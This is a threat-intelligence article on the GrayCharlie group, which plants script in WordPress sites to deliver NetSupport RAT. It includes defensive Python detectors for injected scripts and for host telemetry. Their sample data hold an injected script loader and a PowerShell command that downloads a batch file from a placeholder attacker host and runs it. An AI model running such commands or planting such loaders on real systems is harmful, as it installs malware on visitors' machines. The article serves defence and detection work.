GrayCharlie Exploits WordPress Sites to Deploy NetSupport RAT and Stealc Malware
Since mid-2023, a cybercriminal group tracked as GrayCharlie has been compromising WordPress websites and embedding malicious JavaScript in them to push malware to visitors. The cluster overlaps with the previously tracked SmartApeSG activity, also known as ZPHP or HANEMONEY. Its primary payload is NetSupport RAT, a remote access trojan built on the legitimate NetSupport Manager remote-administration software, which gives operators full interactive control of an infected host. GrayCharlie has also deployed the Stealc information stealer and, more recently, SectopRAT, extending its ability to exfiltrate sensitive data from compromised machines.
Infection Mechanism
GrayCharlie injects a script tag into the pages of legitimate but compromised WordPress sites, so that it appears in the Document Object Model (DOM) of every page the site serves. The tag references an external JavaScript file hosted on attacker-controlled servers. When a visitor loads an injected page, that script fingerprints the browser and operating system and chooses a lure accordingly: either a convincing fake browser-update prompt that hands the visitor a file to run, or a ClickFix-style fake CAPTCHA that instructs the visitor to paste a command into their own machine. Neither lure uses a browser exploit; both depend on the victim executing the payload themselves.
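A simple way to hunt for this kind of injection is to parse the HTML a site actually serves and flag any script tag that loads from a host the site does not normally use, plus any inline script that creates a script element at runtime (the usual shape of a small loader that pulls in a second stage). The Python below is an added example written for this article, not code from the original report or from Recorded Future; the site hostname, the allowlist and the sample page are constructed, and the attacker-controlled domains in it are placeholders.

```python
"""Find injected <script> tags in a WordPress page's HTML.

Added example, not code from the original article or from Recorded Future.
The sample page, the site hostname and the allowlisted domains are all
constructed for illustration.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed: hosts this site is expected to load scripts from.
ALLOWED_HOSTS = {"example-lawfirm.test", "cdn.example-lawfirm.test"}

# Matches inline code that creates a <script> element at runtime, the usual
# way a small injected loader fetches a second-stage script.
DYNAMIC_LOADER = re.compile(r"createElement\(\s*['\"]script['\"]\s*\)", re.I)


class ScriptCollector(HTMLParser):
    """Collects external script src values and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.srcs, self.inline = [], []
        self._in_script, self._buf = False, []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.srcs.append(src)
        else:
            self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def script_host(src, page_host):
    """Resolve a src attribute to the host it actually loads from."""
    if src.startswith("//"):          # protocol-relative URL
        src = "https:" + src
    parsed = urlparse(src)
    if not parsed.netloc:             # relative path: served by the site itself
        return page_host
    return (parsed.hostname or "").lower()


def find_suspicious_scripts(html, page_host, allowed=ALLOWED_HOSTS):
    """Return (kind, evidence) pairs for scripts that deserve a closer look."""
    p = ScriptCollector()
    p.feed(html)
    findings = []
    for src in p.srcs:
        if script_host(src, page_host) not in allowed:
            findings.append(("external-src", src))
    for body in p.inline:
        if DYNAMIC_LOADER.search(body):
            findings.append(("dynamic-loader", " ".join(body.split())[:80]))
    return findings


# Constructed sample page: two legitimate scripts, one injected tag pointing
# off-site, and one inline loader that fetches a second stage at runtime.
SAMPLE_PAGE = """<html><head>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script src="https://cdn.example-lawfirm.test/theme.js"></script>
<script src="//static.attacker-controlled.test/loader.js"></script>
<script>
  var s = document.createElement('script');
  s.src = 'https://stage2.attacker-controlled.test/x.js';
  document.head.appendChild(s);
</script>
</head><body><p>Welcome</p></body></html>"""

if __name__ == "__main__":
    for kind, evidence in find_suspicious_scripts(SAMPLE_PAGE, "example-lawfirm.test"):
        print(f"{kind}: {evidence}")
```

Run it against the HTML as fetched by an ordinary browser user agent rather than against the theme files on disk: injections stored in the database or added by a compromised plugin only show up in the rendered output, and some loaders serve different content to crawlers. A protocol-relative `//` src is resolved explicitly because it is an easy way for an injected tag to slip past a naive `https://` check.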
Infrastructure and Operations
Analysts at Recorded Future have linked GrayCharlie's backend infrastructure primarily to MivoCloud and HZ Hosting Ltd. They identified two main clusters of NetSupport RAT command-and-control (C2) servers, distinguished by their TLS certificate naming patterns, license keys, and serial numbers, and used consistently throughout 2025. C2 traffic runs over TCP port 443 so that it blends in with ordinary HTTPS, and the group administers its staging servers over SSH. Browsing patterns observed on higher-tier infrastructure suggest that at least some GrayCharlie members are Russian-speaking.
Targeted Industries and Geographies
GrayCharlie's attacks span a range of industries worldwide, with the United States the most frequently targeted country. At least fifteen U.S. law firm websites carried identical malicious JavaScript injections pointing to the same attacker domain. Researchers assess that these firms were compromised through a supply-chain attack involving SMB Team, an IT services company serving numerous law firms across North America: stolen credentials associated with an SMB Team email address surfaced around the time the malicious domain first became active.
Attack Chains
When a victim runs the fake-update file, a JavaScript script executed by Windows Script Host (wscript.exe), it spawns PowerShell, which downloads and extracts a complete NetSupport RAT client into the user's AppData folder. The ClickFix chain ends in the same place: the command the user pastes retrieves a batch file that installs the RAT and writes a Registry Run key so the client starts on every reboot. Operators then connect through the C2 channel, perform system reconnaissance, and can push SectopRAT as a secondary payload.
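Both chains leave the same footprints in process, file and registry telemetry, and those footprints are far more useful correlated than alone: an admin's PowerShell session or a vendor's Run key is routine on its own, but wscript.exe spawning PowerShell, an executable landing under AppData and a Run key pointing at it within minutes is not. The Python below is an added example, not code from the original report or from Recorded Future. It encodes each step as a small rule over an assumed normalised event schema (field names ts, host, type, parent, image, cmdline, path, key, data are an assumption, not any particular EDR's format) and alerts only when two or more distinct rules fire on one host inside a short window. The events, hostnames and paths are constructed, and the choice to treat a pasted ClickFix command as launching from explorer.exe is an assumption of this example.

```python
"""Correlate host telemetry for the two GrayCharlie execution chains.

Added example, not code from the original article or from Recorded Future.
Event records and hostnames are constructed; the field names are an assumed
normalised schema rather than any particular EDR's format.
"""
from collections import defaultdict

POWERSHELL = {"powershell.exe", "pwsh.exe"}
SHELLS = POWERSHELL | {"cmd.exe"}


def wscript_spawns_powershell(e):
    """Fake-update chain: the .js lure runs under wscript.exe and starts PowerShell."""
    return (e["type"] == "process" and e["parent"].lower() == "wscript.exe"
            and e["image"].lower() in POWERSHELL)


def powershell_drops_exe_in_appdata(e):
    """PowerShell extracting the RAT client into the user's AppData folder."""
    p = e.get("path", "").lower()
    return (e["type"] == "file" and e["image"].lower() in POWERSHELL
            and "\\appdata\\" in p and p.endswith(".exe"))


def clickfix_fetches_batch(e):
    """ClickFix chain: a pasted shell command that downloads a .bat file.
    Assumption: the pasted command is launched from explorer.exe (Run dialog)."""
    c = e.get("cmdline", "").lower()
    return (e["type"] == "process" and e["parent"].lower() == "explorer.exe"
            and e["image"].lower() in SHELLS and "http" in c and ".bat" in c)


def run_key_points_into_appdata(e):
    """Persistence: a Run value whose target lives under AppData."""
    return (e["type"] == "registry"
            and "\\currentversion\\run\\" in e["key"].lower()
            and "\\appdata\\" in e["data"].lower())


RULES = [wscript_spawns_powershell, powershell_drops_exe_in_appdata,
         clickfix_fetches_batch, run_key_points_into_appdata]


def correlate(events, window=300):
    """Alert when two or more distinct rules fire on one host within `window` seconds."""
    hits = defaultdict(list)                      # host -> [(ts, rule name)]
    for e in sorted(events, key=lambda e: e["ts"]):
        for rule in RULES:
            if rule(e):
                hits[e["host"]].append((e["ts"], rule.__name__))
    alerts = []
    for host, hs in hits.items():
        for t0, _ in hs:                          # slide the window over each hit
            names = {n for t, n in hs if t0 <= t <= t0 + window}
            if len(names) >= 2:
                alerts.append({"host": host, "first_ts": t0, "rules": sorted(names)})
                break
    return alerts


# Constructed events. WS01: fake-update chain. WS02: benign admin and vendor
# activity that trips no rule. WS03: ClickFix chain.
SAMPLE_EVENTS = [
    {"ts": 100, "host": "WS01", "type": "process", "parent": "explorer.exe", "image": "wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\Downloads\Update.js"'},
    {"ts": 101, "host": "WS01", "type": "process", "parent": "wscript.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -c <download and extract>"},
    {"ts": 104, "host": "WS01", "type": "file", "image": "powershell.exe",
     "path": r"C:\Users\alice\AppData\Roaming\Update\client.exe"},
    {"ts": 105, "host": "WS01", "type": "registry", "image": "powershell.exe",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Update",
     "data": r"C:\Users\alice\AppData\Roaming\Update\client.exe"},
    {"ts": 200, "host": "WS02", "type": "process", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\inventory.ps1"},
    {"ts": 900, "host": "WS02", "type": "registry", "image": "msiexec.exe",
     "key": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Vendor",
     "data": r"C:\Program Files\Vendor\agent.exe"},
    {"ts": 500, "host": "WS03", "type": "process", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell -c \"iwr http://stage.attacker-controlled.test/i.bat -OutFile $env:TEMP\\i.bat; & $env:TEMP\\i.bat\""},
    {"ts": 503, "host": "WS03", "type": "registry", "image": "cmd.exe",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Client",
     "data": r"C:\Users\bob\AppData\Local\Client\client.exe"},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

Each rule maps directly onto a Sigma rule for the corresponding log source (process creation, file event, registry set), and the correlation step is what keeps the individual rules loose enough to survive renamed payloads without flooding analysts. Tune the window to the dwell time you actually observe between the lure being run and the Run key appearing.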
Mitigation Strategies
To reduce exposure to such attacks, security teams should:
– Block Known Malicious IPs and Domains: Apply network-level blocks for the IP addresses and domains associated with GrayCharlie, and review proxy and DNS logs for earlier connections to them.
– Deploy Detection Rules: Use YARA rules against dropped files, Snort rules against C2 traffic, and Sigma rules against host logs for behaviours such as wscript.exe spawning PowerShell, executables being written under AppData, and Run keys that point into it.
– Regularly Update and Patch Systems: Keep all software, especially WordPress core, themes, and plugins, up to date to close the vulnerabilities used to plant the injections.
– Educate Users: Train staff to recognize fake browser-update prompts and ClickFix-style CAPTCHA pages, and never to paste a command from a web page into a command prompt or the Windows Run dialog.
By implementing these measures, organizations can enhance their defenses against sophisticated threats like those posed by GrayCharlie.